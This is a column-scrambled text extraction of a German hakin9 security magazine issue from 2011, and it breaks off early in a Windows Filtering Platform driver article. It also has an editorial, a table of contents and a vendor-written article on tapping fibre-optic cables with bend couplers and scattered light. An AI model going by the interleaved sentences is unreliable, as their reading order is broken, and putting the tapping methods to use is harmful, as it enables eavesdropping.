Sie sind auf Seite 1von 50

SSL-Zertifikate

Einkaufen ist Vertrauenssache -


online und offline!
Ihre Vorteile

Bis zu

90 Tage
längere Laufzeit*

Vertra Jederzeit
u
Sie au en
f über
kostenloser
Jahre
Erfahr
ung
Austausch
unSERE PRodukTE
Zusätzliche Lizenzen
• Domain Validation (DV)-Zertifikate ohne Aufpreis*
• Organization Validation (OV)-Zertifikate
• Extended Validation (EV)-Zertifikate Unkomplizierte Lieferung

auf Rechnung**
• Single-Zertifikate
• Wildcard-Zertifikate
• Multidomain (MDC)-Zertifikate
Persönlicher
Support
• Unified Communication /
Subject Alternative Name (UCC/SAN)-Zertifikate in deutsch, englisch,
spanisch und polnisch
• Server Gated Cryptographie (SGC)-Zertifikate

* in den Produktlinien Lite,


Silver und Gold

** bei Pay-as-you-Go
LIEBE HAKIN9 LESER,

2011 ist schon da - die erste Januar Ausgabe von hakin9 auch.
Das Hauptthema dieser Ausgabe ist „Windows Filtering Platform:
Netzwerkdatenfilterung unter Windows“ - der Artikel von René Espenhahn.
Beginnend mit Windows Vista hat Microsoft die Windows Filtering Platform in
ihr Betriebssystem integriert. Sie soll die vielen über Jahrzehnte entstandenen
Teillösungen zur Filterung der ein- und ausgehenden Netzwerkdaten ersetzen
und eine einheitliche Basis zur Filterung bereitstellen. In diesem Artikel werden
die Grundlagen der Windows Filtering Platform vorgestellt. Darauf aufbauend
wird ein Beispiel aus dem Windows Driver Kit näher erläutert.
Kann ein quelloffenes Pentesting-Tool an seine kommerzielle Pendants he-
ranreichen? Welche Informationen eines Zielsystems sind für einen erfolgrei-
chen Exploit erforderlich? Welche Vorteile bringt das Metasploit Framework?
Darüber erfahren Sie aus dem Artikel von Alexander Winkler „Das Metasploit
Framework als Unterstützung bei Penetrationstests“ in der Rubrik Tools.
Lichtgeschwindigkeit ist die höchste Geschwindigkeit, mit der sich Einheiten
bewegen können. Auch beim Austausch von Computerdaten setzt man auf
optische Übertragungswege, um Höchstgeschwindigkeiten zu erreichen. Mit
mehreren Gigabit pro Sekunde werden große Datenmengen in Backbone-
Strukturen oder zum Zusammenschluss von Rechenzentren ausgetauscht.
Wie Glasfaserleitungen durch Lauschattacken bedroht werden, warum das so
ist und welche Schutzmaßnahmen IT-Verantwortliche ergreifen sollten, erläu-
tert uns Leonhard Zilz in dem Artikel „Angriffe in Lichtgeschwindigkeit - Gefahr
durch Lauschattacken auf Glasfaserleitungen“ in der Rubrik Angriff.
Besonders empfehlenswert ist das Interview mit Thomas Hackner, dem
Geschäftsführer von HACKNER Security Intelligence. Diesmal unterhalten
wir uns über Industrie- und Wirtschaftsspionage, IT-Penetration Tests, Social
Engineering Audits und das Projekt SecurityPitfalls.org.
Ich hoffe, dass wir mit dieser Ausgabe Ihren Herausforderungen gewachsen
sind.
Wenn Sie Ideen, Bemerkungen oder Tipps für Hakin9 haben, neh-
men Sie sich kurz Zeit und beantworten die 11 Fragen, die unter: http://
hakin9.org/de/leserumfrage zu finden sind. Ihre Meinung ist uns wichtig.
Damit helfen Sie uns das hakin9 IT Security Magazin noch besser zu
gestalten und weiterzuentwickeln.

Viel Spaß bei der Lektüre!


Ilona Przybysławska

5/2009 HAKIN9 4
1/2011

INHALTSVERZEICHNIS
ANGRIFF PRAXIS
06 Angriffe in Lichtgeschwindigkeit Gefahr 20 Schwachstellen bei der Ressourcenopti-
durch Lauschattacken auf Glasfaserleitungen mierung im virtuellen Raum
Leonhard Zilz Steve Hampicke
Lichtgeschwindigkeit ist die höchste Geschwindigkeit, Die Virtualisierung von physischen Systemen gewinnt
mit der sich Einheiten bewegen können. Auch beim mehr und mehr an Bedeutung. Mittlerweile ein alter
Austausch von Computerdaten setzt man auf optische Hase unter den Virtualisierungsarten ist die Servervir-
Übertragungswege, um Höchstgeschwindigkeiten zu tualisierung. Sie hat sich bereits in Unternehmen und
erreichen. Mit mehreren Gigabit pro Sekunde werden Behörden etabliert und verdrängt erfolgreich die „alte“
große Datenmengen in Backbone-Strukturen oder zum physische Serverstruktur. Unternehmen und Behörden
Zusammenschluss von Rechenzentren ausgetauscht. versprechen sich durch den Einsatz der Virtualisie-
Je mehr Daten in solchen Glasfasernetzen übertragen rung Kosteneinsparungen durch eine Reduzierung der
werden, umso brisanter werden auch Abhörattacken. Server-Hardware, Senkung der Energie und Minimie-
rung des benötigten Platzes im Rechenzentrum. Doch
die Virtualisierung von Servern bringt durch die neuen
SICHERHEITSANWEN- Techniken auch zusätzliches Gefahrenpotential gegen-
DUNGEN über physischen Servern mit sich.

10 Windows Filtering Platform: Netzwerkda-


tenfilterung unter Windows TOOLS
René Espenhahn 32 Das Metasploit Framework als Unterstüt-
Beginnend mit Windows Vista hat Microsoft die Windows zung bei Penetrationstests
Filtering Platform in ihr Betriebssystem integriert. Sie soll Alexander Winkler
die vielen über Jahrzehnte entstandenen Teillösungen zur Genaue und stets aktuelle Informationen zu besitzen
Filterung der ein- und ausgehenden Netzwerkdaten erset- ist heutzutage sehr viel wert, alles andere gleicht einem
zen und eine einheitliche Basis zur Filterung bereitstellen. Blindflug im Düsenjet. Dies stimmt jedenfalls auch in
In diesem Artikel werden die Grundlagen der Windows Fil- Verbindung mit Penetrationstest. Ein Test kann immer
tering Platform vorgestellt. Darauf aufbauend wird ein Bei- nur das widerspiegeln was überhaupt erst entdeckt wur-
spiel aus dem Windows Driver Kit näher erläutert. de. Das Metasploit Framework eignet sich in besonderer
Weise als unterstützendes Mittel beim Pentesting.

Umschlagsentwurf: Przemysław Banasiewicz Anmerkung!


Werbung: adv@software.com.pl Die in der Zeitschrift demonstrierten Techniken
herausgegeben vom Verlag: sind AUSSCHLIEßLICH in eigenen Rechner-
Software Press Sp. z o. o. SK Anschrift: netzen zu testen! Die Redaktion übernimmt
Software Press Sp. z o.o. SK keine Haftung für eventuelle Schäden oder
Geschäftsführer: Paweł Marciniak ul. Bokserska 1, 02-682 Warszawa, Poland Konsequenzen, die aus der unangemessenen
Tel. +48 22 427 36 56, Fax +48 22 244 24 59 Anwendung der beschriebenen Techniken
Managing Director: Ewa Łozowicka www.hakin9.org/de entstehen. Die Anwendung der dargestellten
ewa.lozowicka@software.com.pl Techniken kann auch zum Datenverlust führen!
Die Redaktion bemüht sich, dafür Sorge zu hakin9 erscheint in folgenden Sprachversionen
Chefredakteurin: Ilona Przybysławska tragen, dass die in der Zeitschrift sowie auf und Ländern: deutsche Version (Deutschland,
ilona.przybyslawska@software.com.pl den begleitenden Datenträgern erhaltenen Schweiz, Österreich, Luxemburg), französische
Informationen und Anwendungen zutreffend Version (Frankreich, Kanada, Belgien, Marok-
Redaktion/Betatester: Leonhard Zilz, und funktionsfähig sind, übernimmt jedoch ko), spanische Version (Spanien, Portugal),
Steve Hampicke, René Espenhahn, Alexan- keinerlei Gewähr für derer Geeignetheit für polnische Version (Polen), englische Version
der Winkler, Christian Stockhorst, Thomas bestimmte Verwendungszwecke. Alle Mar- (Kanada, USA)
Hackner, Christian Heutger, Björn Schulz, kenzeichen, Logos und Handelsmarken, die
Michael Schratt, Ilias Aidonis sich in der Zeitschrift befinden, sind regist-
rierte oder nicht-registrierte Markenzeichen
Produktion: Andrzej Kuca der jeweiligen Eigenümer und dienen nur als
DTP: Przemysław Banasiewicz inhaltliche Ergänzungen.

4 6/2010
InhaltsverzeIchnIs

36 Ncrack – Netzwerkauthentifizierungen
knacken
Christian Stockhorst
Dieser Artikel beschreibt wie mit dem Tool Ncrack ver-
schiedene Dienste im Netzwerk bzw. die Computer und
andere Geräte im Netzwerk auf denen diese Dienste
laufen auf schwache Passwörter überprüft werden kön-
nen. Ncrack bedient sich dabei einem modularem An-
satz, für verschiedene Services.

INTERVIEW
44 Interview mit Thomas Hackner
„Zu aller erst sollte man sich seiner Situation, seiner
schutzwürdigen Interessen und seiner Risiken bewusst
sein.“ Mehr erfahren Sie aus dem Interview mit Thomas
Hackner, dem Geschäftsführer von HACKNER Security
Intelligence.

29 Die rasche Auslieferung statischer Inhalte


EXPERTENBEREICH mittels Secure CDN - Weil auch bei der Sicher-
PSW GROUP heit die Geschwindigkeit zählt
Christian Heutger
26 Malware-Scan mittels Comodo Bei der Übertragung von Inhalten ist auf Websites und
HackerProof oder VeriSign Trust Seal in Online-Shops die Geschwindigkeit einer der wesent-
Christian Heutger lichsten Erfolgsfaktoren: Denn Kundenbindung sowie
Bedingt durch die Befürchtung vieler Verbraucher, beim ein gutes Listing in Suchmaschinen sind im Internet
Einkauf im Internet Opfer von Identitäts- beziehungswei- eben auch von der Höhe der Geschwindigkeit abhän-
se Datendiebstahl zu werden, entgingen Online-Händ- gig, mit der Inhalte – ganz gleich ob Texte, Bilder, Flash-
lern allein im Jahr 2008 Umsätze in Höhe von 21 Mil- Content, Scripts oder Videos – geladen werden. Indem
liarden US-Dollar. Das ergaben Studien von VeriSign, sie dafür sorgt, dass Besucher Freude an einer „schnel-
einem Spezialisten für Zertifikatslösungen im Internet. len“ Website haben und sie dadurch öfter besuchen so-
Für Online-Shop- und Website-Betreiber gilt es daher wie länger auf ihr verweilen, übt die Lade-Geschwindig-
Lösungen zu finden, mit deren Hilfe sie Besuchern ihrer keit einen wesentlichen Einfluss auf die Qualität eines
Website, also potenziellen Kunden, aufzeigen können, Websitebesuchs und damit auf den Umsatz aus.
dass sie sich auf einer vertrauenswürdigen, sicheren
Website befinden, die täglich auf Schadcode, Malware
und sonstige Schwachstellen hin gescannt wird.

Im Zusammenhang mit den Änderungen, die in letzter Zeit in dem


deutschen Recht stattgefunden haben und die IT-Sicherheit be-
treffen, möchten wir ankündigen, dass hakin9-Abwehrmethoden
Magazin seinem Profil treu bleibt.
Unser Magazin dient ausschließlich den Erkenntniszwecken.
Alle im Magazin präsentierten Methoden sollen für eine sichere IT
fungieren. Wir legen einen großen Wert auf die Entwicklung von
einem sicheren elektronischen Umsatz im Internet und der Be-
kämpfung von IT Kriminalität.

hakin9.org/de 5
ANGRIFF

Angriffe in Lichtgeschwindigkeit
Gefahr durch Lauschattacken auf Glasfaserleitungen
Leonhard Zilz

Lichtgeschwindigkeit ist die höchste Geschwindigkeit, mit der


sich Einheiten bewegen können. Auch beim Austausch von
Computerdaten setzt man auf optische Übertragungswege, um
Höchstgeschwindigkeiten zu erreichen. Mit mehreren Gigabit pro
Sekunde werden große Datenmengen in Backbone-Strukturen oder
zum Zusammenschluss von Rechenzentren ausgetauscht.

IN DIESEM ARTIKEL ERFAHREN SIE… WAS SIE VORHER WISSEN SOLLTEN…


• wie Glasfaserleitungen durch Lauschattacken bedroht wer- • kein spezielles Vorwissen
den, warum das so ist und welche Schutzmaßnahmen IT-Ver-
antwortliche ergreifen sollten.

J
e mehr Daten in solchen Glasfasernetzen übertra- nächste Enthüllung kündigt das Internet-Projekt an, das In-
gen werden, umso brisanter werden auch Abhör- nenleben einer großen US-Bank ausstellen zu wollen. Die
attacken. Enthüllungsplattform, aber auch klassische Medien, greifen
Geheime Informationen in fremden Händen – die Auswir- zur Erfüllung ihrer journalistischen Aufgabe auf Material zu-
kungen kennt man von WikiLeaks. Von Filmmaterial über rück, das an sie weitergeleitet wurde. So brisant die ver-
US-Militäroperationen bis zu diplomatischen Geheimpa- öffentlichten Informationen auch sein mögen - auf einem
pieren reichen die veröffentlichten Dokumente bisher. Als anderen Feld sind Finanzinstitute sowie viele andere Unter-

Abbildung 1. Lauschangriff auf Glasfaserkabel mit der Abbildung 2. Angreifer biegen die Glasfaser, um mittels
Splitter-Coupler-Methode. Biegekoppler auf den Informationsfluss zuzugreifen.

6 1/2011
Angriffe in Lichtgeschwindigkeit

nehmen viel direkter betroffen. Bekannte Schwachstellen gnals ist im Angriffsverlauf technisch nachweisbar. Dafür
optischer Glasfaserleitungen lassen sich ausnutzen, um an wird nicht einmal Spezialtechnik benötigt, denn solche
wertvolle Informationen zu kommen. Geräte sind frei erhältlich und gehören zur Standardaus-
Denn Glasfaserstrecken sind vor allem bei Hochlei- rüstung der Wartungstechniker, die den Zustand und die
stungsrechenzentren mit besonders hohen Anforde- Funktion von Lichtwellenleitern regelmäßig überprüfen.
rungen an Rechenleistung und Bandbreite im Einsatz, Neugierige Mitlauscher können aber auch den direk-
wie sie in Banken, Versicherungen, Unternehmen und ten Kontakt mit der Datenleitung komplett vermeiden
öffentlichen Verwaltungen typisch sind. Hier laufen in („Non-touching Methods“). Sie machen sich dabei zu-
Hochgeschwindigkeit übertragene Echtzeitdaten und nutze, dass jedes Glasfaserkabel eine minimale Licht-
bandbreitenintensive Dienste über optische Übertra- menge während des Weitertransports verliert. Empfind-
gungssysteme. Der Datenhunger moderner Netzwerke liche Fotodetektoren können diese Rayleigh-Streuung
wächst und so müssen die Verbindungswege neben ei- auffangen, die seitlich aus dem Kabel austritt. Aus dem
ner hohen Übertragungsgeschwindigkeit auch bei Ska- technischen Betrieb kennen die Carrier diesen Streuef-
lierbarkeit, Kapazität, Kompatibilität und Wirtschaftlich- fekt und gleichen den Verlust auf langen Übertragungs-
keit überzeugen. strecken aus, indem sie die Signale verstärken. In
Optische Glasfaserleitungen mit Gigabit-Übertra- gleicher Weise erhalten unbefugte Angreifer nunmehr
gungsgeschwindigkeiten decken diese Bedürfnisse ab lesbare Daten und können sie über Snifferprogramme
und verschicken Echtzeitinformationen von Standort auswerten. Auch große Echtzeit-Datenmengen lassen
zu Standort. Sie verfügen über die notwendigen Eigen- sich so auf Interna, Passwörter, Projekt-, Kunden- oder
schaften, um der im täglichen Geschäftsbetrieb anfal- Personendaten durchsuchen.
lenden Datenflut aus E-Mails, hochauflösenden Bildern
oder E-Business-Systeminformationen Herr zu werden. Wie verschaffen sich
In gleicher Weise punktet die Kommunikationstechno- Angreifer physischen Zugriff?
logie in Lichtgeschwindigkeit bei Einsatzszenarien mit Die fest eingebauten Zugangspunkte eines Glasfasernet-
noch schärferen technischen Vorgaben – wie zum Bei- zes eignen sich als unauffälliger Angriffspunkt für Daten-
spiel bei Backup- und Disaster-Recovery-Daten. Unter
Einhaltung von Compliance- und Best-Practice-Vorga-
ben lassen sich alle relevanten Daten auf separate Spei-
chermedien übertragen. Glasfasernetze sorgen auch für
den reibungslosen Betrieb gemeinschaftlich genutzter
ERP-Systeme und E-Business-Applikationen.

Wenn Glasfasern gebogen werden…


Neben den vielen Vorteilen dürfen auch die sicherheits-
technischen Nachteile nicht verschwiegen werden. Im
öffentlichen Bewusstsein nicht verankert ist zum Bei-
spiel, dass der blitzschnelle Austausch vertraulicher In-
formationen über optische Netzwerke nicht ohne Risi-
ko ist. Lange hielt sich das Gerücht, Glasfaserleitungen
seien im Gegensatz zu Kupferleitungen abhörsicher.
Dabei sind für erfolgreiche Attacken auf optische Daten
lediglich andere Angriffsmethoden nötig, um in Glasfa-
sernetzen fündig zu werden.
Über solche „Optical Tapping Methods“ lassen sich im
allein deutschlandweit 340.000 Kilometer großen Glas-
fasernetz jederzeit und von überall vermeintlich siche-
re Informationen abfangen. Durch Biegen der Glasfaser
(„Splitter-Coupler-Methode“) mittels Biegekoppler lässt
sich ein kleiner Prozentsatz des Lichts umleiten, ohne die
Glasfaser zu verletzen. Wirtschaftsspione können dann
auf den Informationsfluss heimlich zugreifen, das Signal
über moderne Empfänger verstärken und die Daten in
digital umgewandelter Form auslesen. Während des ge-
samten Lauschangriffes bleibt der Netzwerkbetrieb stö- Abbildung 3. Rund um die Erde liegen über 300
rungsfrei und nur eine minimale Veränderung des Nutzsi- Millionen Kilometer gezogene Glasfaserkabel.

hakin9.org/de 7
ANGRIFF

Abbildung 4. Hardware-Verschlüsselungslösungen von InfoGuard bringen „Dunkel ins Licht“.

diebe. In den Verteilerkästen sind die einzelnen Fasern der Kryptographie verdunkelt
Kabel miteinander verbunden und einige Leitungen eines geheime Informationen
Kabelbündels häufig auch markiert. Eigentlich nutzen Pro- Best-Practice-Vorgaben für das Banken- und Versiche-
vider die Verteilerkästen, die über das ganze Streckennetz rungsumfeld sowie andere Branchen empfehlen daher,
an verschiedenen Orten verteilt sind, nur zur Erkennung den Transport sensibler Informationen grundsätzlich durch
und Beseitigung von Störungen. Nach einem erfolgrei- starke Verschlüsselung zu schützen. Das schreiben Regel-
chen Zugriff auf die Wartungskästen haben die Angreifer werke wie SOX, PCI-DSS, Basel II oder Datenschutzrichtli-
leichtes Spiel und können Lauschangriffe beginnen. nien vor. Auch das deutsche Bundesamt für Sicherheit in
Und das ist leichter als gedacht, denn die Spleisstel- der Informationstechnik (BSI) sieht Handlungsbedarf und
len sind in der Regel nur ungenügend vor unbefugtem empfiehlt den Einsatz von Kryptographie. Im Rahmen ei-
Zugriff geschützt und damit eine echte Schwachstelle ner Information-Risk-Management-Strategie sind dabei
des Streckennetzes. Kein Wunder also, dass mittler- Verschlüsselungstechnologien wie AES (Advanced En-
weile mehrere Fälle dokumentiert wurden, bei denen cryption Standard) mit Schlüssellängen bis zu 256 Bit die
Glasfaserverbindungen abgehört wurden. In der Nähe gängige Methode, sensible Daten zu schützen.
der Finanzmetropole Frankfurt am Main beispielsweise Ein Spezialanbieter für die Entwicklung und Implemen-
starteten unbekannte Eindringlinge einen Abhörversuch tierung von Verschlüsselungslösungen in optischen Glas-
auf drei Hauptverbindungen und wollten den über Glas- fasernetzen ist die Schweizer InfoGuard AG. Mit einem
faserleitungen laufenden Datenverkehr mitschneiden. Produktportfolio verschiedener Hardware-Appliances
Ein vergleichbarer Lauschangriff auf die US-amerikani- konzentriert sie sich auf die kryptographische Absiche-
sche Supermarktkette Hannaford hatte den Diebstahl rung hochsensibler Umgebungen im Banken-, Industrie-
von circa 4,2 Millionen Kreditkartendaten zur Folge. Der und Dienstleistungsumfeld. InfoGuard bietet Verschlüsse-
größte Industrieverband Nordamerikas, die National lungsplattformen mit Übertragungsraten von bis zu zehn
Association of Manufacturers (NAM), geht deshalb von Gigabit pro Sekunde für s���������������������������������
tark ausgelastete Links und zeit-
einer ernstzunehmenden Gefährdung durch den Raub kritische Anwendungen. Die Chiffriergeräte zum Schutz
optisch übertragener Daten aus. Ihre Fachleute war- von Gigabit-Ethernet-, SONET-, SDH-, Fibre-Channel-,
nen, dass das Anzapfen von Glasfaserleitungen eine FICON-, Fast-Ethernet- und E1-Verbindungen kommen
weit verbreitete Methode zur Wirtschaftsspionage ist. unabhängig von der eingesetzten Netzwerk-Topologie oh-
In einer aktuellen IDC-Studie fragt der Analyst Romain ne Overhead aus und lassen sich flexibel in die bestehen-
Fouchereau provokativ, ob die vermeintliche Sicherheit in den Netzwerkinfrastruktur e integrieren.
optischen Glasfasernetzen nicht nur eine optische Täu-
schung sei. Schließlich gehe Glasfasernetzen in der öf-
fentlichen Wahrnehmung fälschlicherweise immer noch LEONHARD ZILZ
der Ruf voraus, die schnellste, zuverlässigste und sicher- Der Autor ist Sales Director Europe Central & East bei der Info-
ste Technologie zu sein, um Daten zwischen verschie- Guard AG. Seit drei Jahrzehnten ist er in der IT Branche in ver-
denen Netzwerken auszutauschen. Fouchereaus Fazit: schiedenen verantwortlichen Positionen tätig und hat in den
„Dieser Ruf hat sich als falsch erwiesen, denn neue und vergangenen Jahren seinen beruflichen Schwerpunkt auf die
kostengünstige Technologien haben es Hackern ermög- Themen Sicherheit und Verschlüsselung von Daten gelegt.
licht, auf einfache Art und Weise Daten zu stehlen.“ Kontakt mit dem Autor: leonhard.zilz@infoguard.com

8 1/2011
SICHERHEITSANWENDUNGEN

Windows Filtering Platform


Netzwerkdatenfilterung unter Windows
René Espenhahn
Beginnend mit Windows Vista hat Microsoft die Windows Filtering
Platform in ihr Betriebssystem integriert. Sie soll die vielen über
Jahrzehnte entstandenen Teillösungen zur Filterung der ein- und
ausgehenden Netzwerkdaten ersetzen und eine einheitliche Basis zur
Filterung bereitstellen. In diesem Artikel werden die Grundlagen der
Windows Filtering Platform vorgestellt. Darauf aufbauend wird ein
Beispiel aus dem Windows Driver Kit näher erläutert.
IN DIESEM ARTIKEL ERFAHREN SIE… WAS SIE VORHER WISSEN SOLLTEN…
• Grundlagen der Windows Filtering Platform. • Aufbau des TCP/IP-Stack.
• Entwicklung eines Netzwerkfilters mittels der Windows Filte- • Grundlagen zur Kerneltreiberentwicklung.
ring Platform

Einführung findet sich einer im User-Mode und drei im Kernel-Mo-


Mit der Veröffentlichung von Windows Vista im Jahr 2007 de des Betriebssystems. User-Mode und Kernel-Mode
hatte Microsoft unter dem Namen Next generation network sind dabei Ausführungsebenen des Betriebssystems.
driver stack den Netzwerkstack des Betriebssystems na- Im User-Mode werden alle normalen Programme wie
hezu komplett erneuert. Zu den Neuerungen gehörte unter beispielsweise Office ausgeführt, während im Kernel-
anderem die Windows Filtering Platform[1] (WFP). Sie soll- Mode die Treiber sowie Betriebssystem-interne Funkti-
te spätestens ab Windows 7 die verwendeten Filter-Treiber onen ausgeführt werden.
des Transport Driver Interface (TDI), die TCP/IP-Filter- und Seitens der WFP ist die Base Filter Engine (BFE) im
Firewall-Hook-Treiber, die Winsock Layered Service Provi- User-Mode angesiedelt. Sie bietet verwaltende Schnitt-
der (LSP) und teilweise die Intermediate-Treiber der Net- stellen zur Installation, Konfiguration und Deinstallation
work Driver Interface Specification (NDIS) durch eine ein- von WFP-Komponenten sowie Schnittstellen zur Sta-
heitliche Plattform zum Filtern der ein- und ausgehenden tusabfrage der installierten Komponenten. Zu den Kom-
Netzwerkdaten vollständig ablösen. Unter Windows Vista ponenten der WFP zählen hauptsächlich Filter. Damit
hatte die WFP allerdings noch einige Kinderkrankheiten, ein Filter Netzwerkdaten filtern
die dazu führten, dass viele Sicherheitsfirmen sie in ihren kann, muss er um weitere Komponenten, die in Abbil-
Produkten bis Windows 7 nicht produktiv einsetzten. Ein- dung 2 um den Filter dargestellt sind, ergänzt werden.
hergehend mit Windows 7 hat Microsoft die WFP verbes- Hierbei sind vor allem die pink dargestellten Kompo-
sert und die Kinderkrankheiten weitestgehend beseitigt. nenten wichtig, denn sie sind zwingend für den Betrieb
Weiterhin haben sie den alten Technologien noch einen eines Filters notwendig. Sie werden im späteren Verlauf
letzten zeitlichen Aufschub gegeben und nicht, wie in den detaillierter erklärt. Dadurch, dass die BFE im User-Mo-
Fußnoten[2] im MSDN vermerkt, deren Unterstützung mit de angesiedelt ist, lassen sich Filter innerhalb norma-
der Veröffentlichung von Windows 7 eingestellt. Nichts des- ler Programme erstellen und konfigurieren ohne, dass
to trotz kann Microsoft TDI & Co. nun jederzeit aus ihrem zwingend ein Kernel-Mode-Treiber entwickelt werden
Betriebssystem entfernen. Es ist somit spätestens an der muss. Wird ein Filter mittels der Schnittstelle der BFE
Zeit auf die Windows Filtering Platform umzusteigen. installiert, landet dieser, falls er nicht auf dem Internet
Key Exchange (IKE)-, IPsec- oder User-Mode Remo-
Architektur der WFP te Procedure Call (RPC) Layer operiert, in der Kernel-
Die WFP besteht aus vier Teilen, die in Abbildung 1 Mode Filter Engine (KMFE) und somit im Kernel des
farblich hervor gehoben sind. Von den vier Teilen be- Betriebssystems.

10 1/2011
Windows Filtering Platform Netzwerkdatenfilterung unter Windows

Die KMFE ist das Herzstück der WFP. Sie steuert die WFP-Layern installiert sind und diese können die Netz-
Anwendung sämtlicher installierter Filter. Wie in Abbil- werkdaten nach ihren Kriterien filtern. Die KMFE sam-
dung 2 ersichtlich muss jeder Filter zwingend eine Lay- melt alle Entscheidungen der Filter (Block oder Permit)
er-Komponente besitzen. Die Layer-Komponente defi- und sendet das Endergebnis zurück zur ursprünglichen
niert, auf welchem WFP-Layer der Filter arbeitet und Shim-Komponente. Wird der Shim-Komponente von
somit, welche Daten der Filter von der KMFE zur Filte- der KMFE ein Block übermittelt, blockiert und verwirft
rung übermittelt bekommt. In Abbildung 1 werden inner- sie die Netzwerkdaten. Bei einem Permit können die
halb der orange hervorgehobenen KMFE lediglich die Daten ihren Weg zum nächsten TCP/IP-Layer und so-
zum TCP/IP- mit zur nächsten Shim-Komponente bzw. zum Ziel fort-
Stack passenden Filter-Layer dargestellt. Insgesamt setzen. Abbildung 3 veranschaulicht dies.
besitzt die KMFE über 70 verschiedene Layer[4], an de- Filter können, wie in Abbildung 2 dargestellt, optio-
nen Filter hinzugefügt werden können, um die dort ein- nal Bedingungen enthalten. Eine Bedingung kann bei-
treffenden Netzwerkdaten zu filtern. Die hohe Zahl an spielsweise sein, dass ein Filter nur Netzwerkdaten von
Filter-Layer ergibt sich größten Teils daraus, dass viele einem speziellen Quellport filtern soll. Obwohl mit Win-
Filter-Layer bis zu viermal vorhanden sind. Viermal des- dows 7 die Anzahl der unterschiedlichen Bedingungen
wegen, da die WFP oft zwischen IPv4 und IPv6 sowie gestiegen ist, beschränken sie sich weiterhin auf die
ein- und ausgehender Richtung der Netzwerkdaten un- Metadaten des Payload der Netzwerkdaten. Soll hinge-
terscheidet. gen untersucht werden, ob das Wort rainy im Payload
Die Netzwerkdaten bezieht die KMFE mittels der in der Netzwerkdaten enthalten ist, so ist dieses mit ei-
Abbildung 1 grün dargestellten Shim-Komponenten aus ner Bedingung nicht realisierbar. Es muss ein Callout
dem TCP/IP-Stack. Die Shim-Komponenten sind hier- verwendet werden. Callouts sind benutzerdefinierte
bei auf den verschiedenen Layern des TCP/IP-Stack Routinen im Kernel-Mode. Besitzt ein Filter eine Call-
installiert und leiten die bei ihnen ankommenden Netz- out-Referenz, so leitet der Filter alle Netzwerkdaten
werkdaten zur KMFE um. Die KMFE reicht die Daten zur Entscheidungsfindung an den Callout weiter. Inner-
ihrerseits weiter zu den Filtern, die auf den betreffenden halb des Callout kann ein Entwickler die Netzwerkdaten

Abbildung 1. Architektur der Windows Filtering Platform. Quelle: [3]

hakin9.org/de 11
SICHERHEITSANWENDUNGEN

ganz nach seinen Wünschen untersuchen und daraus ten, aufgrund des Permits, zurück in den TCP/IP-Stack,
die Entscheidung Block zum Blockieren oder Permit sodass sie ihren Weg fortsetzen können.
zum Passieren treffen.
In Abbildung 3 werden zwei konkrete Abläufe einer Vorbereitung zur Filterentwicklung
Filterung mittels der WFP schematisch dargestellt. Im Im weiteren Verlauf wird nun ein von Microsoft zur Ver-
oberen Fall trifft eine Anfrage (A.) mit Zielport (ZP) 80 fügung gestellter Filter untersucht, der mittels Callout
im TCP/IP-Stack ein. Der Stream Layer Shim der WFP eine Filterung des Payload vollzieht. Der Filter ersetzt
leitet die Anfrage aus dem TCP/IP-Stack um zur KM- dabei in den Netzwerkdaten mit Zielport 5001 das Wort
FE. Die KMFE überprüft nun, welche Filter die Anfrage rainy gegen das Wort sunny. Da für den Callout ein Ker-
zur Filterung übergeben bekommen müssen und sor- nel-Mode Treiber notwendig ist, wird das Windows Dri-
tiert diese absteigend nach ihrer Gewichtung, auf die im ver Kit (WDK) benötigt[5].
späteren Verlauf noch eingegangen wird. Parallel da- Das WDK beinhaltet die Build-Umgebungen für die
zu prüft sie die Bedingungen der Filter und sieht, dass verschiedenen Windows-Versionen zum Kompilieren
der Filter mit der hohen Gewichtung (HG, zweiter von von Treibern, alle notwendigen Header-Dateien sowie
rechts) die Bedingung hat, nur Daten mit Zielport 8080 Tools zur Treiberanalyse. Zum Entwickeln des Treibers
zu filtern. Da die Bedingung zur Anfrage nicht passt, wird Visual Studio 2010 verwendet, allerdings nur des-
wird dieser Filter übersprungen und dem niedriger ge- sen Editor. Kompiliert wird der Treiber nicht mittels Visu-
wichteten (NG) Filter die Anfrage übergeben. Dieser al Studio, sondern mit der jeweiligen Build-Umgebung
verfügt über einen Callout und sendet seinerseits die des WDK.
Anfrage zur Entscheidungsfindung weiter an den Call- Sobald das WDK installiert ist, befindet sich das hier
out. Der Callout entscheidet, dass die Anfrage blockiert untersuchte WFP-Beispiel[6] im Unterordner src\net-
werden soll und gibt diese Entscheidung zurück, wel- work\trans\stmedit. Innerhalb von Visual Studio wird
che nun, da kein weiterer Filter vorhanden ist, bis zum nun ein neues, leeres Visual C++-Projekt erstellt. Im
ursprünglichen Shim durchgereicht wird. Dieser verwirft Anschluss daran sollten alle Dateien aus dem WFP-
die Anfrage aufgrund des Blocks. Beispiel-Verzeichnis in das Projektverzeichnis kopiert
Der zweite Fall betrifft eine Anfrage mit dem Zielport werden, damit der ursprüngliche Beispielcode unverän-
8080, sodass beide Filter aktiv werden. Hier kommt die dert bleibt. Nach dem Kopieren müssen die einzelnen
Gewichtung zum Tragen und der HG-Filter bekommt Quelltext- (*.c) und Headerdateien (*.h) dem Visual Stu-
die Anfrage zuerst von der KMFE. Nachdem er seine dio-Projekt hinzugefügt werden. Alle anderen Dateien
Entscheidung getroffen hat, bekommt der niedriger ge- sind vorerst nicht relevant und können ignoriert werden.
wichtete Filter die Daten und gibt sie wieder seinem Visual Studio zeigt nun an, dass einige #include un-
Callout, der in diesem Fall, genauso wie der HG-Filter, bekannt sind. Das liegt daran, dass Visual Studio das
ein Permit zurückgibt. Die Permit-Entscheidung wird er- WDK nicht kennt. Dieses lässt sich lösen, indem das
neut, da kein weiterer Filter vorhanden ist, bis zum ur- WDK in den Projektoptionen unter dem Punkt VC++-
sprünglichen Shim durchgereicht. Dieser gibt die Da- Verzeichnisse hinzugefügt wird. Dazu muss bei Inclu-

Abbildung 2. Komponenten der Windows Filtering Platform.

12 1/2011
Windows Filtering Platform Netzwerkdatenfilterung unter Windows

Listing 1. MDL Speicherreservierung


unter Windows 7 weiterhin Fehler angezeigt werden, so
liegt das an Leerzeilen im Windows 7 SDK, die entfernt
gStringToReplaceMdl= IoAllocateMdl( werden müssen[7].
configStringToReplace,
strlen(configStringToReplace), Das Streamedit-Beispiel
FALSE, Das Microsoft Streamedit-Beispiel ist ein reiner Kernel-
FALSE, Mode Treiber. Die Filter können deswegen nicht mittels
NULL der Schnittstellen der BFE, sondern müssen direkt an
); der KMFE installiert werden. Der Beispiel-Treiber glie-
